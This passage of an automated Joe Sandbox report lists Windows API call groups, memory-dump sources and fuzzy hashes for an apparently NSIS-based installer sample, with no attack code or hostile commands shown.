                                      • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                      • GetTickCount.KERNEL32 ref: 00403303
                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                      • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                      • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                      • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                      • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                      • String ID:
                                      • API String ID: 2883127279-0
                                      • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                      • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                      • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                      • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 0040492E
                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                      • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                      • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                      • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                      APIs
                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringlstrcmp
                                      • String ID: !N~
                                      • API String ID: 623250636-529124213
                                      • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                      • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                      • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                      • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                      APIs
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                      • CloseHandle.KERNEL32(?), ref: 00405C9D
                                      Strings
                                      • Error launching installer, xrefs: 00405C74
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                      • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                      • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                      • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                      APIs
                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: CloseHandlelstrlenwvsprintf
                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                      • API String ID: 3509786178-2769509956
                                      • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                      • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                      • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                      • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                      • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                      • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                      • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                      • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                      • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4